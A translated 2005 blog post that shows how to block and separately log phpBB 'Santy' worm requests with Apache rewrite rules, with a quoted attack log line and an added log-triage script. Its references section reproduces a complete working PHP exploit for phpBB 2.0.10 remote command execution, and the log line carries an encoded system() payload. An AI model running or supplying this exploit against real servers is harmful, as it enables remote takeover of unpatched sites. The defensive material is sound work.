Blocking the phpBB worm in Apache and logging it separately
Posted : 2005/02/19 00:07
Author : 좋은진호 (truefeel, http://coffeenix.net/)
Written : 2005.2.16 (Wed)
Attacks by phpBB worms (the Santy worm and others) that exploit the security problem
in phpBB versions before 2.0.11 are still being attempted in large numbers. Upgrading
phpBB to the latest version goes without saying, but I also needed a way to deal with
the constant attacks eating up system load and the annoying log entries they leave.
1. phpBB worm attack log
The access log shows entries of the following form. (A single line in the log.)
65.77.xxx.xx - - [30/Dec/2004:19:58:01 +0900] "GET /...path.../viewtopic.php?p=1303&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)
%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)
%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)
%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
HTTP/1.0" 302 712 "-" "Mozilla/4.0"
phpBB's viewtopic.php passes the value received in the highlight= variable through the
urldecode() function, which leaves a security hole open, and the worm abuses it.
Another characteristic of the worm is that its agent is "Mozilla/4.0". Blocking on this
user agent alone could also block legitimate users, so the method used here matches on
the URL instead.
2. Blocking the worm and logging it separately
Let's look at an httpd.conf Apache configuration that blocks the worm and at the same
time stores its web log entries separately.
RewriteEngine On
RewriteCond %{QUERY_STRING} ^[a-z]{1}=(.*)highlight=\%2527\%252E
RewriteRule ^.*$ http://127.0.0.1/ [R,L,E=phpbb:1]
CustomLog logs/phpbb_worm_log common env=phpbb
Through its URL rewriting settings, Apache can hand a request for a particular URL to a
different internal page or send it to a page on an entirely different site. When a URL
matches a condition, it can also set a variable inside Apache.
For details on Apache's rewriting rules, read the "URL Rewriting Guide" on the Apache
home page; here we go through the configuration one line at a time.
The first line turns URL rewriting on.
The second line is the condition. It checks whether the URI (query) has the form shown
above, that is, whether it matches the start of the logged request, as in:
p=1303&highlight=%2527%252Esystem(...
t=1303&highlight=%2527%252Esystem(...
The third line defines what to do when the condition matches: a request judged to be
the worm is redirected to http://127.0.0.1/. In other words, the request is handed back
to the worm itself. Another important part here is 'E=phpbb:1', which says to put the
value 1 into the environment variable phpbb. It serves as the marker that lets the log
be stored separately.
The fourth line says that requests for which the environment variable phpbb is defined
are logged to logs/phpbb_worm_log.
There~ now go and knock out that annoying worm in one shot.
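An added example (not part of the original article, and not Apache's own code): a Python triage script that applies the article's RewriteCond pattern to the raw query string of access-log lines and decodes the chr() chain to show what a logged request carried. The /forum path, the 192.0.2.10 line and the function names are assumptions made for the example; the log lines are constructed from the sample in section 1.

```python
import re
from urllib.parse import unquote

# The article's RewriteCond pattern. Apache tests it against the raw, still
# URL-encoded QUERY_STRING, which is also what the access log records.
RULE = r'^[a-z]{1}=(.*)highlight=\%2527\%252E'
COND_AS_WRITTEN = re.compile(RULE)
COND_NOCASE = re.compile(RULE, re.IGNORECASE)  # effect of an added [NC] flag
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed samples. LOGGED is the request from section 1 with the elided
# path replaced by the placeholder /forum; LOWERCASE is the same request with
# the %252e spelling used by the proof-of-concept listed in the references.
LOGGED = (
    '65.77.xxx.xx - - [30/Dec/2004:19:58:01 +0900] "GET /forum/viewtopic.php'
    '?p=1303&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)'
    '%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)'
    '%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)'
    '%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)'
    '%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))'
    '%252E%2527 HTTP/1.0" 302 712 "-" "Mozilla/4.0"')
LOWERCASE = LOGGED.replace('%252E', '%252e')
BENIGN = ('192.0.2.10 - - [30/Dec/2004:20:01:12 +0900] "GET /forum/viewtopic.php'
          '?t=5&highlight=apache HTTP/1.0" 200 5120 "-" "Mozilla/4.0"')

def query_string(log_line):
    """Return the raw query string of a common-log-format line, or ''."""
    m = REQUEST.search(log_line)
    return m.group(1).partition('?')[2] if m else ''

def decode_command(qs):
    """Undo both encoding layers (%2527 -> %27 -> ') and join the chr() chain."""
    plain = unquote(unquote(qs))
    return ''.join(chr(int(n)) for n in re.findall(r'chr\((\d+)\)', plain, re.I))

def triage(log_line):
    """Report whether each form of the rule fires and what the request carried."""
    qs = query_string(log_line)
    return {'as_written': bool(COND_AS_WRITTEN.search(qs)),
            'nocase': bool(COND_NOCASE.search(qs)),
            'command': decode_command(qs)}

if __name__ == '__main__':
    for name in ('LOGGED', 'LOWERCASE', 'BENIGN'):
        print(name, triage(globals()[name]))
```

The pattern as written fires on the logged request but not on the lowercase %252e spelling; adding the NC flag to the RewriteCond line covers both. To keep these hits out of the main access log as well, the existing CustomLog line can take env=!phpbb.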
3. References
* Apache 1.3 URL Rewriting Guide
http://httpd.apache.org/docs/misc/rewriteguide.html
* On blocking the phpBB worm (post by Raymond Dijkxhoorn)
http://www.securityfocus.com/archive/1/385103
* On the security problem in phpBB's highlight variable
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
* phpBB Remote Command Execution (Viewtopic.php Highlight)
http://www.securiteam.com/unixfocus/6J00O15BPS.html
Exploit Code :
#!/usr/bin/php -q
/*
# phpBB 2.0.10 execute command by pokleyzz
# 15th November 2004 : 4:04 a.m
#
# bug found by How Dark (
http://www.howdark.com
) (1st October 2004)
#
# Requirement:
#
# PHP 4.x with curl extension;
#
# ** Selamat Hari Raya **
*/
if (!(function_exists('curl_init'))) {
echo "cURL extension required\n";
exit;
}
if ($argv[2]){
$url = $argv[1];
$command = $argv[2];
}
else {
echo "Usage: ".$argv[0]."
[topic id] [proxy]\n\n";
echo "\tURL\t URL to phpnBB site (ex:
http://127.0.0.1/html
)\n";
echo "\tcommand\t command to execute on server (ex: 'ls -la')\n";
echo "\ttopic_id\t topic id\n";
echo "\tproxy\t optional proxy url (ex:
http://10.10.10.10:8080
)\n";
exit;
}
if ($argv[3])
$topic = $argv[3];
else
$topic = 1;
if ($argv[4])
$proxy = $argv[4];
$cmd = str2chr($command);
$action = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd." )%252e%2527";
$ch=curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
echo $res;
function str2chr($str){
for($i = 0;$i < strlen($str);$i++){
$chr .= "chr(".ord($str{$i}).")";
if ($i != strlen($str) -1)
$chr .= "%252e";
}
return $chr;
}
?>
* Using the [E=VAR:VAL] flag to pass a variable to CGI
http://www.webmasterworld.com/forum92/2631.htm